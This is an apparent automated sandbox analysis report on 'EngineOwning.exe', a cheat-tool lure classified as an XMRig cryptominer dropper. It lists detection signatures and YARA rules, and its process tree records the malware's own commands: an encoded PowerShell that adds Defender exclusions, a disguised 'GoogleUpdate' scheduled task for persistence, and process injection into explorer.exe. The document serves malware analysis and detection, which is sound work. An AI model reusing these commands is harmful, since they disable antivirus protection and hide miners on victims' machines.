Edit tour
Windows
Analysis Report
EngineOwning.exe
Overview
General Information
Detection
Xmrig
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Detected unpacking (changes PE section rights)
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Found strings related to Crypto-Mining
Encrypted powershell cmdline option found
Sample is not signed and drops a device driver
Queries memory information (via WMI often done to detect virtual machines)
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
DNS related to crypt mining pools
Connects to a pastebin service (likely for C&C)
Uses schtasks.exe or at.exe to add and modify task schedules
PE file contains section with special chars
Writes to foreign memory regions
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Potential dropper URLs found in powershell memory
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Creates driver files
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
PE file contains sections with non-standard names
Found potential string decryption / allocating functions
Contains functionality to get notified if a device is plugged in / out
Contains functionality to call native functions
Contains functionality to read the clipboard data
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Potential key logger detected (key state polling based)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Sigma detected: Suspicious Execution of Powershell with Base64
Classification
- System is w10x64
- EngineOwning.exe (PID: 7076 cmdline:
"C:\Users\ user\Deskt op\EngineO wning.exe" MD5: 6B7E5F4517D6837EEA3C06BAE837F767) - conhost.exe (PID: 7088 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - cmd.exe (PID: 3012 cmdline:
C:\Windows \system32\ cmd.exe /c start C:/ ProgramDat a/winrsdho st.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - winrsdhost.exe (PID: 5428 cmdline:
C:/Program Data/winrs dhost.exe MD5: 108368196293017A706ADE912F519495) - cmd.exe (PID: 588 cmdline:
C:\Windows \System32\ cmd.exe" c md /c powe rshell -En codedComma nd "PAAjAH MAdABnAGgA IwA+ACAAQQ BkAGQALQBN AHAAUAByAG UAZgBlAHIA ZQBuAGMAZQ AgADwAIwBm AGUAcAAjAD 4AIAAtAEUA eABjAGwAdQ BzAGkAbwBu AFAAYQB0AG gAIABAACgA JABlAG4Adg A6AFUAcwBl AHIAUAByAG 8AZgBpAGwA ZQAsACQAZQ BuAHYAOgBT AHkAcwB0AG UAbQBEAHIA aQB2AGUAKQ AgADwAIwBj AHUAaAAjAD 4AIAAtAEYA bwByAGMAZQ AgADwAIwBm AGoAZQAjAD 4A MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 4632 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 6744 cmdline:
powershell -EncodedC ommand "PA AjAHMAdABn AGgAIwA+AC AAQQBkAGQA LQBNAHAAUA ByAGUAZgBl AHIAZQBuAG MAZQAgADwA IwBmAGUAcA AjAD4AIAAt AEUAeABjAG wAdQBzAGkA bwBuAFAAYQ B0AGgAIABA ACgAJABlAG 4AdgA6AFUA cwBlAHIAUA ByAG8AZgBp AGwAZQAsAC QAZQBuAHYA OgBTAHkAcw B0AGUAbQBE AHIAaQB2AG UAKQAgADwA IwBjAHUAaA AjAD4AIAAt AEYAbwByAG MAZQAgADwA IwBmAGoAZQ AjAD4A" MD5: 95000560239032BC68B4C2FDFCDEF913) - cmd.exe (PID: 2056 cmdline:
C:\Windows \System32\ cmd.exe" c md /c scht asks /crea te /f /sc onlogon /r l highest /ru "Syste m" /tn "Go ogleUpdate TaskMachin eQC" /tr " C:\Users\u ser\AppDat a\Roaming\ Windows\se rvices86.e xe MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 4448 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - schtasks.exe (PID: 5444 cmdline:
schtasks / create /f /sc onlogo n /rl high est /ru "S ystem" /tn "GoogleUp dateTaskMa chineQC" / tr "C:\Use rs\user\Ap pData\Roam ing\Window s\services 86.exe" MD5: 838D346D1D28F00783B7A6C6BD03A0DA) - cmd.exe (PID: 6644 cmdline:
C:\Windows \System32\ cmd.exe" c md /c "C:\ Users\user \AppData\R oaming\Win dows\servi ces86.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 6168 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - services86.exe (PID: 6232 cmdline:
C:\Users\u ser\AppDat a\Roaming\ Windows\se rvices86.e xe MD5: 108368196293017A706ADE912F519495) - cmd.exe (PID: 6036 cmdline:
C:\Windows \System32\ cmd.exe" c md /c powe rshell -En codedComma nd "PAAjAH MAdABnAGgA IwA+ACAAQQ BkAGQALQBN AHAAUAByAG UAZgBlAHIA ZQBuAGMAZQ AgADwAIwBm AGUAcAAjAD 4AIAAtAEUA eABjAGwAdQ BzAGkAbwBu AFAAYQB0AG gAIABAACgA JABlAG4Adg A6AFUAcwBl AHIAUAByAG 8AZgBpAGwA ZQAsACQAZQ BuAHYAOgBT AHkAcwB0AG UAbQBEAHIA aQB2AGUAKQ AgADwAIwBj AHUAaAAjAD 4AIAAtAEYA bwByAGMAZQ AgADwAIwBm AGoAZQAjAD 4A MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 6140 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 2996 cmdline:
powershell -EncodedC ommand "PA AjAHMAdABn AGgAIwA+AC AAQQBkAGQA LQBNAHAAUA ByAGUAZgBl AHIAZQBuAG MAZQAgADwA IwBmAGUAcA AjAD4AIAAt AEUAeABjAG wAdQBzAGkA bwBuAFAAYQ B0AGgAIABA ACgAJABlAG 4AdgA6AFUA cwBlAHIAUA ByAG8AZgBp AGwAZQAsAC QAZQBuAHYA OgBTAHkAcw B0AGUAbQBE AHIAaQB2AG UAKQAgADwA IwBjAHUAaA AjAD4AIAAt AEYAbwByAG MAZQAgADwA IwBmAGoAZQ AjAD4A" MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 6540 cmdline:
C:\Windows \System32\ conhost.ex e MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - conhost.exe (PID: 5912 cmdline:
C:\Windows \System32\ conhost.ex e" "pbsidf qjdbrp MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - explorer.exe (PID: 5388 cmdline:
C:\Windows \explorer. exe zaxwuj rpzpz0 NV/ UX0XBuNRBW S1fF1Br++r CWld6jYh8E V4bO5NNvAb /5HIZwMhaD 5NHJK5z9yN MjMMytH6YY 4V55yfqWTQ cp12cDSmlF 6KKjp+Efu9 KvL4SaXUjJ 1+pbf+qj6k 80A11p9RBq /ea7q4JQbA of6DO9w2NS wY2P/eQdDv kJvlXTHwvN MDMUjwmGA6 FU/A9poINN +IS9cW53yu kVYFD6Su/c 8CqGYS4ifg lLSM0j7mQy kFqVEF0Cjx SELaijRRGU V4pKZhHpb1 2LA0Vdcl7e kwOnt/zMSP iSwVay5rEB RJnuUFPIIk tvItGKBK4A CGTOTqoPi0 Hwp99GwYdY 6hvlhzROvS xGFr63zNaV IZV1HL7mUP X5ICuxBxUg AURBxJcPcC DFtB6+YHcg ebLsBjBHY6 e778xlKAi+ KMQhPPHAt2 IhKnBuQNhY bkw20Qh4Os KyGjRuikRJ Y8g3TEE/Rp YBkU2gM2pu de0dusb3bc c6h3jJ8mqx 1aqIvyYff4 zch7WANZWO TWRwEz/LV6 jXQrqAfeuV /LYITPX+2l LumdpKzFrc ng= MD5: AD5296B280E8F522A8A897C96BAB0E1D) - cmd.exe (PID: 5956 cmdline:
C:\Windows \system32\ cmd.exe /c start C:/ ProgramDat a/mdsigstu b.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - mdsigstub.exe (PID: 6436 cmdline:
C:/Program Data/mdsig stub.exe MD5: 62D39F4717804AE34F820704722C5284) - WerFault.exe (PID: 3376 cmdline:
C:\Windows \system32\ WerFault.e xe -u -p 6 436 -s 107 2 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0) - cmd.exe (PID: 6516 cmdline:
C:\Windows \system32\ cmd.exe /c cls MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - WerFault.exe (PID: 6640 cmdline:
C:\Windows \system32\ WerFault.e xe -u -p 7 076 -s 190 8 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
- svchost.exe (PID: 6636 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 5576 cmdline:
C:\Windows \System32\ svchost.ex e -k Local SystemNetw orkRestric ted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 4516 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 6312 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 5872 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_PE_Discord_Attachment_Oct21_1 | Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN) | Florian Roth |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
PUA_Crypto_Mining_CommandLine_Indicators_Oct21 | Detects command line parameters often used by crypto mining software | Florian Roth |
| |
JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
PUA_Crypto_Mining_CommandLine_Indicators_Oct21 | Detects command line parameters often used by crypto mining software | Florian Roth |
| |
MAL_XMR_Miner_May19_1 | Detects Monero Crypto Coin Miner | Florian Roth |
| |
Click to see the 31 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_PE_Discord_Attachment_Oct21_1 | Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN) | Florian Roth |
| |
SUSP_PE_Discord_Attachment_Oct21_1 | Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN) | Florian Roth |
| |
SUSP_PE_Discord_Attachment_Oct21_1 | Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN) | Florian Roth |
| |
SUSP_PE_Discord_Attachment_Oct21_1 | Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN) | Florian Roth |
| |
MAL_XMR_Miner_May19_1 | Detects Monero Crypto Coin Miner | Florian Roth |
| |
Click to see the 53 entries |
There are no malicious signatures, click here to show all signatures.
Source: | Author: frack113: |
Source: | Author: frack113: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): |
⊘No Snort rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: |
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Source: | Virustotal: | Perma Link | ||
Source: | Metadefender: | Perma Link | ||
Source: | ReversingLabs: | |||
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: | |||
Source: | Virustotal: | Perma Link | ||
Source: | Metadefender: | Perma Link | ||
Source: | ReversingLabs: | |||
Source: | ReversingLabs: |
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: |
Source: | Avira: | ||
Source: | Avira: |
Bitcoin Miner |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | DNS query: |
Source: | HTTPS traffic detected: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: |
Networking |
---|
Source: | DNS query: |
Source: | String found in memory: | ||
Source: | String found in memory: | ||
Source: | String found in memory: |
Source: | JA3 fingerprint: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | IP Address: | ||
Source: | IP Address: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
Source: | Code function: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |